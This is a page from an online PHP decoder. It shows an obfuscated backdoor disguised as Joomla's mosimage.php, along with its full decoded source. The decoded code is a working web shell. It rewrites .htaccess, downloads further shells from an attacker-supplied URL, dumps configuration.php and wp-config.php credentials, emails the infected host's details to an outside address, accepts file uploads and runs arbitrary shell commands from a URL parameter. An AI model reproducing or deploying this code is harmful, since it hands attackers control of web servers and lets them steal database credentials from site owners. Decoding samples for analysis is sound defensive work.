Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php /** * @version $Id: mosimage.php 21069 2011-04-03 22:58:48Z dextercowley $ ..
Decoded Output download
if(isset($_GET['patch'])) {
$myfile = fopen(".htaccess", "w+") or die("Unable to open file!");
$txt = '<Files ~ "\.(zip|rar|php|php3|php5|php4|phtml|gif|png|phpgif|pHp|PHP|PhP|PHp|pHP|j|J|asp)$">';
$txt .= "
deny from all
";
$txt .= "</Files>
";
$txt .= "<Files 1x.php.j>
";
$txt .= "Order Allow,Deny
";
$txt .= "Allow from all
";
$txt .= "</Files>
";
$txt .= "<Files .inc.php.j>
";
$txt .= "Order Allow,Deny
";
$txt .= "Allow from all
";
$txt .= "</Files>
";
$txt .= "<Files .incz.php.j>
";
$txt .= "Order Allow,Deny
";
$txt .= "Allow from all
";
$txt .= "</Files>
";
$txt .= "<Files 2x.php.j>
";
$txt .= "Order Allow,Deny
";
$txt .= "Allow from all
";
$txt .= "</Files>
";
$txt .= "<Files gelo.php.j>
";
$txt .= "Order Allow,Deny
";
$txt .= "Allow from all
";
$txt .= "</Files>
";
$txt .= "<Files string.php>
";
$txt .= "Order Allow,Deny
";
$txt .= "Allow from all
";
$txt .= "</Files>
";
$txt .= "<Files .libs.php>
";
$txt .= "Order Allow,Deny
";
$txt .= "Allow from all
";
$txt .= "</Files>";
fwrite($myfile, $txt);
fclose($myfile);
exit;
}
if(isset($_GET['clone'])) {
$req = 0;
$loc = '';
$source = (isset($_GET['source'])) ? $_GET['source'] : '';
$file = (isset($_GET['name'])) ? $_GET['name'] : 'string';
if($_GET['type'] == "wp") {
$path = "../../../../../../wp-admin/";
$path2 = "../../../../../wp-admin/";
$path3 = "../../../../../../../wp-admin/";
} else {
$path = "../../../images/";
$path2 = "../../../../images/";
$path3 = "../../../../../images/";
}
if(isset($_GET['path'])) {
$req = 1;
$loc = $_GET['path'];
} else {
if(is_dir($path)) {
$req = 1;
$loc = $path;
} else {
if(is_dir($path2)) {
$req = 1;
$loc = $path2;
} else {
if(is_dir($path3)) {
$req = 1;
$loc = $path3;
}
}
}
}
if($req && !empty($loc)) {
$file = fopen($loc.$file.".php","w+");
$stream = fopen ($source, "r");
while(!feof($stream)) {
$shell .=fgets($stream);
}
fwrite($file, $shell);
fclose($file);
}
exit;
}
if(isset($_GET['j'])){
$p1 = "../../../../../../../";
$p2 = "../../../../../../";
$p3 = "../../../../../";
$p4 = "../../../../";
$p5 = "../../../";
$p6 = "../../";
$p7 = "../";
$j = file_get_contents($p1."configuration.php");
if(!$j) {$j = file_get_contents($p2."configuration.php");
if(!$j) {$j = file_get_contents($p3."configuration.php");
if(!$j) {$j = file_get_contents($p4."configuration.php");
if(!$j) {$j = file_get_contents($p5."configuration.php");
if(!$j) {$j = file_get_contents($p6."configuration.php");
if(!$j) {$j = file_get_contents($p7."configuration.php");
if(!$j) {$j = file_get_contents("configuration.php");
}
}
}
}
}
}
}
echo $j;
exit;
}
if(isset($_GET['w'])){
$p1 = "../../../../../../../";
$p2 = "../../../../../../";
$p3 = "../../../../../";
$p4 = "../../../../";
$p5 = "../../../";
$p6 = "../../";
$p7 = "../";
$w = file_get_contents($p1."wp-config.php");
if(!$w) {$w = file_get_contents($p2."wp-config.php");
if(!$w) {$w = file_get_contents($p3."wp-config.php");
if(!$w) {$w = file_get_contents($p4."wp-config.php");
if(!$w) {$w = file_get_contents($p5."wp-config.php");
if(!$w) {$w = file_get_contents($p6."wp-config.php");
if(!$w) {$w = file_get_contents($p7."wp-config.php");
if(!$w) {$w = file_get_contents("wp-config.php");
}
}
}
}
}
}
}
echo $w;
exit;
}
if(isset($_GET['s'])) {
$host = $_SERVER["HTTP_HOST"];
$uri = $_SERVER["REQUEST_URI"];
$serv = gethostbyname($_SERVER['SERVER_ADDR']);
$addr = gethostbyname($_SERVER['REMOTE_ADDR']);
mail("[email protected]", "kiriman bos $host.$uri", "Url: $host.$uri
Ip :$serv
Ip injector: $addr");
}
$safe = @ini_get('safe_mode');
$secure = (!$safe) ? "SAFE_MODE : OFF" : "SAFE_MODE : ON";
echo "<body style='background:#000;color:#64D300;font-size:14px;'>";
echo "<title>UnKnown - Simple Shell</title><br>";
echo "<b>".$secure."</b><br>";
$cur_user = "(".get_current_user().")";
echo "<b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<b>Uname : ".php_uname()."</b><br>";
echo "<form enctype=multipart/form-data action method=POST><b>Upload File</b><br><input type=hidden name=submit><input type=file name=userfile size=28><br><b>New name: </b><input type=text size=15 name=newname class=ta><input type=submit class=bt value=Upload></form>";
if (isset($_POST['submit'])) {
$uploaddir = pwd();
if (!$name = $_POST['newname']) { $name = $_FILES['userfile']['name'];};
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name);
echo (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name)) ? "!!Upload Failed" : "Success Upload to " . $uploaddir . $name;
}
function pwd() {
$cwd = getcwd();
if ($u = strrpos($cwd, '/')) {
return ($u != strlen($cwd) - 1) ? $cwd . '/' : $cwd;
} elseif($u = strrpos($cwd, '\/')) {
if($u != strlen($cwd) -1){
return $cwd.'\/';
} else{
return $cwd;
}
}
}
echo (isset($_GET['x'])) ? "<pre>" . shell_exec($_GET['x']) . "</pre>" : "<pre>" . shell_exec('ls -la') . "</pre>";
Did this file decode correctly?
Original Code
<?php
/**
* @version $Id: mosimage.php 21069 2011-04-03 22:58:48Z dextercowley $
* @package Joomla
* @copyright Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
* @license GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/
eval(gzinflate(str_rot13(base64_decode('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'))));
?>
Function Calls
gzinflate | 1 |
str_rot13 | 1 |
base64_decode | 1 |
Stats
MD5 | 6694f8d78eefa1a15507a00881c25a92 |
Eval Count | 1 |
Decode Time | 150 ms |